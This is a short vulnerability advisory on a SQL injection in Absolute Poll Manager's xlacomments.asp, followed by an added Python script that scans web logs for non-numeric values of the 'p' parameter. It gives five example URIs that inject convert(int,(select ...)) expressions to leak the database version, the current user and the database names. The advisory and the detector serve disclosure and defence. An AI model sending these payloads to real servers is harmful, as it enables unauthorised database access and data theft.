Absolute Poll Manager 'xlacomments.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))
http://www.example.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))
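
A detection check for the requests listed above, added here as an example and not part of the original advisory: it scans web-server request lines for calls to xlacomments.asp whose `p` parameter is not a plain integer. That `p` normally carries a numeric ID is an assumption, and the log lines, their three-field layout and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines ("METHOD URI STATUS"); not real traffic.
SAMPLE_LOG = [
    "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=12 200",
    "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version)) 500",
    "GET /absolutepm/xlaabsolutepm/xlacomments.asp?P=convert%28int%2C%28select%20user%29%29 500",
    "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=7&p=convert(int,(select+db_name(1))) 500",
    "GET /absolutepm/xlaabsolutepm/default.asp?p=convert(int,1) 200",
    "GET /absolutepm/xlaabsolutepm/xlacomments.asp 200",
]

TARGET = "xlacomments.asp"
# Assumption: a legitimate p value is a short unsigned integer.
NUMERIC = re.compile(r"^\d{1,10}$")


def suspicious_p_values(uri):
    """Return the decoded p values in `uri` that are not plain integers."""
    parts = urlsplit(uri)
    # IIS paths are case-insensitive, so compare in lower case.
    if not parts.path.lower().endswith("/" + TARGET):
        return []
    # parse_qs URL-decodes values ('+' and %xx) and keeps repeated parameters.
    params = parse_qs(parts.query, keep_blank_values=True)
    bad = []
    for name, values in params.items():
        # Classic ASP treats query-string names case-insensitively.
        if name.lower() == "p":
            bad.extend(v for v in values if not NUMERIC.match(v))
    return bad


def scan(lines):
    """Return (uri, offending values, status) for each flagged request."""
    hits = []
    for line in lines:
        fields = line.split(" ")
        if len(fields) != 3:
            continue  # not in the constructed three-field layout
        _method, uri, status = fields
        bad = suspicious_p_values(uri)
        if bad:
            hits.append((uri, bad, int(status)))
    return hits
```

Every value of a repeated `p` is checked because a clean first value can be followed by a second one carrying the expression.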


 

Copyright 2010, SecurityFocus